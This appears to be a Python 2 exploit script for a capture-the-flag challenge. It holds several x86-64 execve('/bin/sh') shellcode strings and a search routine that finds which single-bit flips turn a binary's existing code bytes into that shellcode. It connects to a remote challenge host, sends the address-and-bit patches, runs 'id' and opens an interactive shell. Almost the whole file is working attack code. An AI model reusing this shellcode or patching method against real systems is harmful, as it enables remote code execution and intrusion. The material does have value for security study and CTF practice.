import sys
from queue import Queue
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0b\x05"
shellcode="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"

shellcode=bytearray(shellcode)
'''

base ^ (
'''
def check(base, l, res):
    pp =['%d'%base]
    for c in l:
        base ^= (1 << c)
        pp.append('(1<<%d)' % c)
    if base == res:
        print >> sys.stderr,'ok'
        print >> sys.stderr,' ^ '.join(pp)
        print >> sys.stderr,l
        return True
 
#data = bytearray(']\xc3\x0f\x1f@\x00f.\x0f\x1f\x84\x00\x00\x00\x00\x00\xbe\x10\x10`\x00UH\x81\xee\x10\x10')
data = bytearray(']\xc3\x0f\x1f@\x00f.\x0f\x1f\x84\x00\x00\x00\x00\x00\xbe\x10\x10`\x00UH\x81\xee\x10\x10`\x00H')
data = bytearray('\x00H\x85\xc0t\xf1UH\x89\xe5\xff\xd0]\xe9z\xff\xff\xffUH\x89\xe5H\x8d\xa4$\xc0\xef\xff\xffH')
data = bytearray('u\x11UH\x89\xe5\xe8n\xff\xff\xff]\xc6\x05\x06\n \x00\x01\xf3\xc3\x0f\x1f@\x00\xbf\xc0\r`\x00')

addr = 0x4005F7 #0x4005A0

def calcshit(data,shellcode,addr):
    for i in range(len(shellcode)):
#    i = 3
        print >> sys.stderr,'----'
        print >> sys.stderr,'byte[%d]= %d -> %d' % (i,data[i],shellcode[i])
        q = Queue()
        q.put(data[i])
        ret = None
        foo = []
        done = set()
        while not q.empty():
            
            el = q.get()
            if el in done:
                continue
        
            for j in range(8):
                x=  el ^ (1<<j) 
                if x == shellcode[i]:
                    q = Queue()
                    ret = [j]
                    #                print foo
                    while True:
                        if el == data[i]:
                            break
                    
                        oel = el
                        for a,b,c in foo:            
                            if b == el:
                                ret.append(c)
                                el = a
                                break
                    
                    break
                else:
                    foo.append((el,x,j))
                    q.put(x)
            done.add(el)
            
        if not ret:
            print >> sys.stderr, '[-] fail'
        else:
#            print ret
            ret = ret[::-1]
            if check(data[i],ret,shellcode[i]):
                for c in ret:
                    print >> cl, '%lx:%d' % (addr+i,c)


import socket 
s = socket.socket()
s.connect(('flatearth.fluxfingers.net',1744))
cl = s.makefile()


print >>cl, '400714:5'
calcshit(data,shellcode,addr)
call = bytearray("\xbf\xfd")
mcall  = bytearray("\xc6\xfe")
calcshit(call,mcall,0x40072C+1)
calcshit(bytearray("\x05"),bytearray("\x00"),0x40072A+1) 
print >> cl, '400714:5'

cl.write('id\n')
print cl.read(1024)
import telnetlib
t = telnetlib.Telnet()
t.sock= s
t.interact()

#    break 
#print len(shellcode)
# for b in shellcode:
#     for i in range(8):
#         idx = data.find(chr(b ^ (1 << i)))
#         if idx != -1:
#             print idx,b,i
#             r.append(idx)
#             s = True
#     print sorted(r)
#     print '---'
#     if not s:
#         print 'Failed'